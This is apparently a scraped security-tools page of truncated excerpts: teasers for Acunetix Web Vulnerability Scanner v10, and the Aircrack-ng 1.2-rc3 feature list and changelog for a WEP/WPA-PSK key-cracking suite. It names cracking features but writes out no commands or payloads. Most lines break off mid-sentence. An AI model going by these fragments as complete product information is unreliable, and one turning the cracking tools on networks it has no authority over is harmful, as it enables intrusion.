Many enterprise-grade, mission critical applications are built

Acunetix WVS 10 will ship with a malware URL detection

New in Acunetix Vulnerability Scanner v10

'Login Sequence Recorder' has been re-engineered from

DownloadAcunetix Web Vulnerability Scanner

Here is the second release candidate. Along with a LOT of

Aircrack-ng is the next generation of aircrack with lots of new

More cards/drivers supported

More OS and platforms supported

WEP dictionary attack

WPA Migration mode

Improved cracking speed

Capture with multiple cards

New tools: airtun-ng, packetforge-ng (improved arpforge),

Optimizations, other improvements and bug fixing

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking

Version 1.2-rc3 (changes from aircrack-ng 1.2-rc2) Released 21 Nov 2015:

Airodump-ng: Prevent sending signal to init which caused

Airbase-ng: Allow to use a user-specified ANonce instead

Aircrack-ng: Fixed compilation warnings.

Aircrack-ng: Removed redundant NULL check and fixed

Aircrack-ng: Workaround for segfault when compiling

Airmon-ng: Created version for FreeBSD.

Airmon-ng: Prevent passing invalid values as channel.

Airmon-ng: Handle udev renaming interfaces.

Airmon-ng: Better handling of rfkill.

Airmon-ng: Updated OUI URL.

Airmon-ng: Fix VM detection.

Airmon-ng: Make lsusb optional if there doesn't seem to

Airmon-ng: Various cleanup and fixes (including wording

Airmon-ng: Display iw errors.

Airmon-ng: Improved handling of non-monitor interfaces.

Airmon-ng: Fixed error when running 'check kill'.

Airdrop-ng: Display error instead of stack trace.

Airmon-ng: Fixed bashism.

Airdecap-ng: Allow specifying output file names.